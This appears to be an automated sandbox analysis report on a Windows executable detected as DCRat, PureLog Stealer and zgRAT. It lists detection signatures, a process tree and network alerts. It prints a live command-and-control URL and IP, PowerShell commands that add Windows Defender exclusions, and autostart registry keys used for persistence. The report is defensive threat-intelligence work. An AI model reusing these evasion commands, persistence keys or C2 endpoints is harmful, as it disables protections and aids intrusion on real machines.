Edit tour

Windows Analysis Report
fdsN8iw6WG.exe

Overview

General Information

Sample name:	fdsN8iw6WG.exe renamed because original name is a hash value
Original sample name:	6fb0f1b7e1e962c770ef34e605d1c4ce.exe
Analysis ID:	1526016
MD5:	6fb0f1b7e1e962c770ef34e605d1c4ce
SHA1:	a314d67a1383ba7042b9f5f1d513f4d9177dff35
SHA256:	32058aa91a7e956ae9b48f8ef08ed82c35063d4443d018369c45822da3c9ba03
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops PE files to the user root directory

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

fdsN8iw6WG.exe (PID: 5652 cmdline: "C:\Users\user\Desktop\fdsN8iw6WG.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

csc.exe (PID: 6112 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 2752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 2940 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34F8.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC13EEC4598AE74082ADE16A1F2183AE80.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 4580 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 3012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 1968 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38D0.tmp" "c:\Windows\System32\CSC8295EB2BCC8D4700AEF6D1253A133871.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 2752 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5656 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3340 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7136 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6444 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\fdsN8iw6WG.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7276 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7592 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7660 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

dEhCbXEAIUCUplvbdoWVtmGx.exe (PID: 7840 cmdline: "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

sihost.exe (PID: 1672 cmdline: "C:\Program Files\Microsoft\sihost.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

sihost.exe (PID: 5808 cmdline: "C:\Program Files\Microsoft\sihost.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

dEhCbXEAIUCUplvbdoWVtmGx.exe (PID: 5668 cmdline: "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

dEhCbXEAIUCUplvbdoWVtmGx.exe (PID: 3652 cmdline: "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

fdsN8iw6WG.exe (PID: 5748 cmdline: C:\Users\user\Desktop\fdsN8iw6WG.exe MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

fdsN8iw6WG.exe (PID: 1292 cmdline: C:\Users\user\Desktop\fdsN8iw6WG.exe MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

RuntimeBroker.exe (PID: 6536 cmdline: "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

RuntimeBroker.exe (PID: 6972 cmdline: "C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

sihost.exe (PID: 7880 cmdline: "C:\Program Files\Microsoft\sihost.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

dEhCbXEAIUCUplvbdoWVtmGx.exe (PID: 6628 cmdline: "C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe" MD5: 6FB0F1B7E1E962C770EF34E605D1C4CE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://703648cm.newnyash.top/providerpollpacketdefaultDbasyncTrafficDatalifeDle", "MUTEX": "DCR_MUTEX-YUXnB7xicRhpuDINWn5Y", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
fdsN8iw6WG.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
fdsN8iw6WG.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Microsoft\sihost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Microsoft\sihost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.2119928328.0000000000B52000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.2282454452.000000001306D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: fdsN8iw6WG.exe PID: 5652	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: sihost.exe PID: 5808	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.fdsN8iw6WG.exe.b50000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.fdsN8iw6WG.exe.b50000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\fdsN8iw6WG.exe, ProcessId: 5652, TargetFilename: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fdsN8iw6WG.exe", ParentImage: C:\Users\user\Desktop\fdsN8iw6WG.exe, ParentProcessId: 5652, ParentProcessName: fdsN8iw6WG.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe', ProcessId: 2752, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Microsoft\sihost.exe", CommandLine: "C:\Program Files\Microsoft\sihost.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Microsoft\sihost.exe, NewProcessName: C:\Program Files\Microsoft\sihost.exe, OriginalFileName: C:\Program Files\Microsoft\sihost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Program Files\Microsoft\sihost.exe", ProcessId: 1672, ProcessName: sihost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Microsoft\sihost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fdsN8iw6WG.exe, ProcessId: 5652, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Microsoft\sihost.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\fdsN8iw6WG.exe, ProcessId: 5652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\fdsN8iw6WG.exe", ParentImage: C:\Users\user\Desktop\fdsN8iw6WG.exe, ParentProcessId: 5652, ParentProcessName: fdsN8iw6WG.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline", ProcessId: 6112, ProcessName: csc.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\fdsN8iw6WG.exe, ProcessId: 5652, TargetFilename: C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\fdsN8iw6WG.exe", ParentImage: C:\Users\user\Desktop\fdsN8iw6WG.exe, ParentProcessId: 5652, ParentProcessName: fdsN8iw6WG.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\sihost.exe', ProcessId: 2752, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\fdsN8iw6WG.exe", ParentImage: C:\Users\user\Desktop\fdsN8iw6WG.exe, ParentProcessId: 5652, ParentProcessName: fdsN8iw6WG.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\diacazft\diacazft.cmdline", ProcessId: 6112, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-04T17:16:40.859968+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49889	37.44.238.250	80	TCP
2024-10-04T17:16:51.969391+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49954	37.44.238.250	80	TCP
2024-10-04T17:17:18.453745+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49977	37.44.238.250	80	TCP
2024-10-04T17:17:26.953719+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49978	37.44.238.250	80	TCP
2024-10-04T17:17:31.563091+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49979	37.44.238.250	80	TCP
2024-10-04T17:17:36.703958+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49980	37.44.238.250	80	TCP
2024-10-04T17:17:40.656927+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49981	37.44.238.250	80	TCP
2024-10-04T17:18:03.703750+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49982	37.44.238.250	80	TCP
2024-10-04T17:18:12.922445+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49983	37.44.238.250	80	TCP
2024-10-04T17:18:15.859996+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49984	37.44.238.250	80	TCP
2024-10-04T17:18:21.953878+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49985	37.44.238.250	80	TCP
2024-10-04T17:18:26.022862+0200	2048095	1	A Network Trojan was detected	192.168.2.5	49986	37.44.238.250	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: fdsN8iw6WG.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\V10Cviyryl.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Microsoft\sihost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 00000000.00000002.2282454452.000000001306D000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://703648cm.newnyash.top/providerpollpacketdefaultDbasyncTrafficDatalifeDle", "MUTEX": "DCR_MUTEX-YUXnB7xicRhpuDINWn5Y", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Microsoft\sihost.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\iMBUyFOh.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\nASSbBeV.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\qcbjycVR.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\dEhCbXEAIUCUplvbdoWVtmGx.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: fdsN8iw6WG.exe

ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft\sihost.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: fdsN8iw6WG.exe

Joe Sandbox ML: detected

Source: fdsN8iw6WG.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Windows Portable Devices\dEhCbXEAIUCUplvbdoWVtmGx.exe	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Windows Portable Devices\9e0136ccaf7772	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Windows Sidebar\Shared Gadgets\RuntimeBroker.exe	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Windows Sidebar\Shared Gadgets\9e8d7a4ca61bd9	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Microsoft\sihost.exe	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	Directory created: C:\Program Files\Microsoft\66fc9ff0ee96c2	Jump to behavior

Source: fdsN8iw6WG.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: yXT9UKQtlxtUx0jY65A.pdbekNQTGLIDcuiPehd+XZZKKCwsBQHivX0eK9u+xtYxp3wyQQVngc4yE9B`1[[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]][] source: fdsN8iw6WG.exe, RuntimeBroker.exe.0.dr, dEhCbXEAIUCUplvbdoWVtmGx.exe0.0.dr, dEhCbXEAIUCUplvbdoWVtmGx.exe.0.dr, sihost.exe.0.dr
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\khjlbg4u\khjlbg4u.pdb source: fdsN8iw6WG.exe, 00000000.00000002.2260614296.00000000037A7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\diacazft\diacazft.pdb source: fdsN8iw6WG.exe, 00000000.00000002.2260614296.00000000037A7000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\fdsN8iw6WG.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49889 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49978 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49979 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49980 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49982 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49983 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49981 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49977 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49985 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49984 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49986 -> 37.44.238.250:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49954 -> 37.44.238.250:80

Source: powershell.exe, 00000028.00000002.2751449420.00000284C8C7A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
